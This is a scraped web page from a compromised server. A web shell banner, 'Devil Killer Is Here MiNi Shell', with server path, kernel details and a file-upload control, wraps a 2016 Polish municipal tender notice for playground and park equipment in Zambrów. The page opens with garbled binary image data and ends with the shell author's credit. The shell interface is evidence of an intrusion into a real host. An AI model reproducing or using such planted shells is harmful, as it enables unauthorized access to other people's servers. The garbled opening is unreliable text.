JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160209/28696-N-2016.html

<p class="kh_header"><b>Zambrów: Zagospodarowanie terenu parku miejskiego przy ulicy Cmentarnej w Zambrowie w zakresie dostawa i montaż: urządzeń zabawowych na plac zabaw oraz wyposażenie parku.</b><br>
<b>Numer ogłoszenia: 28696 - 2016; data zamieszczenia: 09.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Zambrów , ul. Fabryczna 3, 18-300 Zambrów, woj. podlaskie, tel. 0862712210 w. 16, faks 086 2712117.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zambrow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenu parku miejskiego przy ulicy Cmentarnej w Zambrowie w zakresie dostawa i montaż: urządzeń zabawowych na plac zabaw oraz wyposażenie parku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i montaż elementów zabawowych, elementów małej architektury na plac zabaw  oraz dostawa i montaż elementów wyposażenia parku przy ul. Cmentarnej. Teren i nawierzchnia przygotowane są zgodnie z projektem. Nawierzchnię Placu zabaw tworzy warstwa piasku o grubości 50 cm.
Skład i rozmieszczenie elementów placu zabaw podane na projekcie należy traktować jako przykładowe, obowiązują wymagania minimalne podane w niniejszym opisie.
Oferenci powinni zaplanować we własnym zakresie skład i rozmieszczenie elementów placu zabaw. 
Do oferty należy dołączyć:
1.	Plan sytuacyjny zagospodarowania placu zabaw uwzględniający strefy bezpieczne każdego urządzenia.
2.	Karty katalogowe i opisy elementów pozwalające na ocenę ich charakterystyczną funkcji, wymiarów i parametrów jakościowych
Wykonawca ma obowiązek wykonania zagospodarowania placu zabaw w sposób zgodny z przedstawionym  do oferty planem  sytuacyjnym.

Wymagania jakościowe oraz ilościowe
Urządzenia zabawowe:
1.	Duży zestaw zabawowy: wymiary minimum 7 x 6m, wysokość całkowita minimum 3,3m, konstrukcja stalowa z rur lub profili zamkniętych, cynkowana ogniowo oraz malowana proszkowo, daszki oraz wypełnienia ścianek wykonane z płyt polietylenowymi HDPE, zestaw składający się z minimum: 
4 wież z daszkami dwuspadowymi;
przejścia między wieżami minimum: kładka z barierkami linowymi, kratownica, przejście tuba, most linowy, wysokość min. 1,2m;
2 zjeżdżalnie o długości minimum 1,5m oraz minimum 2,8m, ślizg ze stali nierdzewnej;
wejścia: wspinaczkowe, drabinka, trap lub schodki.
2.	  Huśtawka bocianie gniazdo: konstrukcja stalowa z rur lub profili zamkniętych, cynkowana ogniowo oraz malowana proszkowo, siedzisko wykonane z ocynkowanej stali oplecionej linami z tworzywa sztucznego, środek siedziska z lin, zawiasy łożyskowane
3.	Huśtawka z koszem plecionym dla osób niepełnosprawnych: konstrukcja stalowa z rur lub profili zamkniętych, cynkowana ogniowo oraz malowana proszkowo, kosz siedziska wykonany z lin z tworzywa sztucznego, 
4.	Karuzela: konstrukcja stalowa z rur lub profili zamkniętych, cynkowana ogniowo oraz malowana proszkowo, siedziska z płyt polietylenowych HDP dla minimum 3 osób
5.	Huśtawka podwójna: konstrukcja stalowa z rur lub profili zamkniętych, cynkowana ogniowo oraz malowana proszkowo, huśtawka podwójna, siedzisko: deseczka z tworzywa sztucznego 
6.	Huśtawka pojedyncza konstrukcja stalowa z rur lub profili zamkniętych, cynkowana ogniowo oraz malowana proszkowo, z siedziskami kubełkowymi dla małych dzieci, łańcuchy ze stali nierdzewnej, zawiasy łożyskowane 
7.	 Bujak na sprężynie: konstrukcja stalowa, cynkowana ogniowo oraz malowana proszkowo, płyt polietylenowe HDPE, konstrukcja bujaka np. konik.
8.	Bujak na sprężynie: konstrukcja stalowa, cynkowana ogniowo oraz malowana proszkowo, płyt polietylenowe HDPE, konstrukcja bujaka np. samochód.
9.	Huśtawka wagowa na sprężynach: konstrukcja stalowa z rur lub profili zamkniętych, cynkowana ogniowo oraz malowana proszkowo, płyt polietylenowymi HDPE
10.	Urządzenie do ćwiczeń zewnętrznych: konstrukcja stalowa cynkowana ogniowo i malowana proszkowo, urządzenia np. surfer wahadło oraz orbitrek
Wszystkie śruby i mocowania wystawione na działanie warunków zewnętrznych powinny być wykonane ze stali nierdzewnej.
Urządzenia zabawowe powinny posiadać certyfikaty spełniające normy bezpieczeństwa.
Mała architektura:
11.	Ławki z oparciem szt. 8: konstrukcja stalowa cynkowane i malowane proszkowo, listwy w siedzisku wykonane z tworzywa sztucznego w kolorze emitującym drewno lub w kolorze brązowym.
12.	Stolik piknikowy z dwoma ławkami szt. 1: konstrukcja stalowa cynkowane i malowane proszkowo, listwy w siedzisku wykonane z odpornego tworzywa sztucznego w kolorze emitującym drewno lub w kolorze brązowym. 
13.	Stojak na rowery: konstrukcja stalowa cynkowana oraz malowana proszkowo, stojak z możliwością ustawienia minimum czterech rowerów. Stojak powinien być zamontowany na zewnątrz placu zabaw na przyległym polbruku po stronie południowej.
14.	Kosze na śmieci szt. 2: konstrukcja stalowa cynkowana i malowana proszkowo, wkłady w kosztach stalowe cynkowane o pojemności do 100 l. 
15.	Ogrodzenie placu zabaw: wykonane w całości ze stali cynkowanej ogniowo, siatka z prętów stalowych O 12 i O 6 mm, wymiary przęsła panelowego 2020 x 1330 mm, siatka w górnej części przęsła wygięta na półokrągło ze względów bezpieczeństwa, przęsła zamontowane na kształtownikach zamkniętych 70x70x3 mm  zakotwiczonych w gruncie. Bramki wejściowe samozamykające się szt. 3 o wymiarach: 110cm x 130cm.  Kolorystyka ogrodzenia: zielony. Długość ogrodzenia 163 m. 
16.	Tablica z regulaminem szt. 1: konstrukcja cynkowana i malowana proszkowo, treść regulaminu umieszczona na płycie HDPE lub z blachy cynkowanej i malowanej proszkowo.
Elementy wyposażenia parku:
17.	Ławski parkowe z oparciem szt. 27: siedzisko-listwy w siedzisku wykonane z  odpornego tworzywa sztucznego w kolorze emitującym drewno lub w kolorze brązowym, konstrukcja stalowa, cynkowana, malowana proszkowo, kolor czarny. Montaż ławek przez przykręcenie do podłoża.
18.	Kosze na śmieci szt. 17: kosze o konstrukcji stalowej z wkładem, cynkowane i malowane proszkowo. Pojemność wkładu 60 l.
Wymagania dodatkowe:
dopuszcza się do montażu jedynie urządzenia, które posiadają certyfikaty, atesty, aprobaty techniczne,
dostarczone urządzenia muszą posiadać oznakowania w/w certyfikatów, atestów, aprobat technicznych,
Uwaga: Istniejące nawierzchnie to ciągi piesze, co wyklucza możliwość poruszania się po nich sprzętu ciężkiego

2.	Zamówienie objęte niniejszym postępowaniem nie obejmuje: 
Prac rozbiórkowych istniejących elementów betonowych,
Makroniwelacji terenu -kształtowanie skarp,
Robót drogowych tj. budowy i wykonania nawierzchni:
alejek parkowych - ciągów pieszych z włączeniem do ciągów w istniejącej części parku,
toru Pumptrack, 
placu zabaw,
Wycinki drzew, cięć pielęgnacyjnych istniejących drzew,
Oświetlenia alejek parkowych,
Montażu instalacji monitoringu terenu projektowanego parku,
Robót w zakresie kształtowania terenów zielonych wraz z pracami agrotechnicznymi,
Wykonania trawników,
Wykonanie obsadzeń (nasadzenia drzew i krzewów),
 (roboty te zawarte są w projekcie budowlanym, i zostały realizowane w etapie I lub stanowić będą kolejny etap realizacji inwestycji)

3.	Szczegółowy opis przedmiotu zamówienia stanowią: opis przedmiotu zamówienia określony w punkcie I.1. SIWZ, dokumentacja projektowa i specyfikacje techniczne wykonania i odbioru robót stanowiące załączniki do niniejszej specyfikacji.
Dokumentacja projektowa stanowi dokument pomocniczy, który ma zobrazować przykładowe zagospodarowanie placu zabaw. Przy wynagrodzeniu ryczałtowym, wiążący jest zakres zamówienia, rodzaj i ilość robót wynikający z opisu przedmiotu zamówienia i z oferty. 
Za ustalenie ilości robot i innych świadczeń oraz sposób przeprowadzenia na tej podstawie kalkulacji ofertowego wynagrodzenia ryczałtowego wynagrodzenia, odpowiada wyłącznie Wykonawca, na nim spoczywa obowiązek rzetelnego sprawdzenia, rzeczywistego zakresu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.22.38.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości:  3 000 PLN.  słownie : trzy tysięce złotych
2. Wadium może  być wnoszone w jednej lub kilku następujących formach:
w pieniądzu  - przelewem na rachunek bankowy Zamawiającego nr 8687750009 0010 0101 0201 0002 z dopiskiem : Przetarg nieograniczony na Zagospodarowanie terenu parku miejskiego przy ul. Cmentarnej w Zambrowie w zakresie: dostawa i montaż urządzeń zabawowych na plac zabaw oraz wyposażenia parku .
 (za datę  wniesienia wadium w pieniądzu liczy się datę wpływu pieniędzy na konto Zamawiającego),
1)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym:
2)	gwarancjach bankowych,
3)	gwarancjach  ubezpieczeniowych
4)	poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.( Dz.U Nr 109,poz 1158, z póż.zm.)
3. Dowód wniesienia wadium należy dołączyć do oferty w następującej formie; 
    1)     potwierdzenie   wpłaty   lub   przelewu  pieniędzy  na rachunek bankowy  Zamawiającego, w 
            w      formie    kserokopii    poświadczonej   za   zgodność  z    oryginałem    przez     osobę/y  
            upoważnioną/e do reprezentowania wykonawcy lub wykonawcę.
    2)    potwierdzenie   wniesienia   wadium   w   pozostałych     formach określonych  w art.45 ust.6   
           w postaci oryginału dokumentu dołączonego do oferty. 
4.	W  przypadku wspólnego ubiegania się dwóch  lub więcej Wykonawców o udzielenie  niniejszego       
      zamówienia( tj.jako konsorcjum), z treści dokumentu wadium, wnoszonego   w  formie innej   niż   
      pieniężna, powinno wynikać, że  zleceniodawca działa w konsorcjum.
5.	Wadium musi obejmować cały okres związania oferta, wadium wniesione w pieniądzu   Zamawiający przechowuje  na rachunku bankowym.
6.	Wykonawca, który nie wniesie wadium do upływu terminu składania ofert lub na przedłużony okres związania ofertą w terminie określonym przez Zamawiającego, zostanie wykluczony z postępowania.
7.  Zamawiający  zwróci, zażąda ponownego wniesienia , zatrzyma wadium na zasadach określonych 
     w art.46 ustawy Pzp.Ustawy pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie posiadania uprawnień do wykonywania działalności lub czynności, jeżeli przepisy ustawy nakładają obowiązek ich posiadania należy przedłożyć oświadczenie stanowiące - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności przez Wykonawcę jest krótszy- w tym okresie, wykonał co najmniej dwie dostawy z montażem  każda polegająca na dostawie i montażu urządzeń zabawowych na plac zabaw, o wartości brutto nie mniejszej niż 50 000 PLN każda oraz załączy  dowody dotyczące dwóch najważniejszych dostaw z montażem określających, czy zostały one wykonane w sposób należyty i prawidłowo ukończone,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie dysponowania potencjałem technicznym do wykonywania zamówienia, należy przedłożyć oświadczenie stanowiące - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie dysponowania zdolnymi do wykonywania zamówienia, należy przedłożyć oświadczenie stanowiące - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże że  posiada   środki   finansowe  lub    zdolność   kredytową  o    wartości  nie   mniejszej  niż   50 000 PLN .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zawarte we wzorze umowy, załącznik nr 6 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://um.zambrow.bip-gov.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zambrów, ul. Fabryczna 3, pok. 341.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.02.2016 godzina 10:00, miejsce: Urząd Miasta Zambrów, ul. Fabryczna 3, sekretariat 225.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com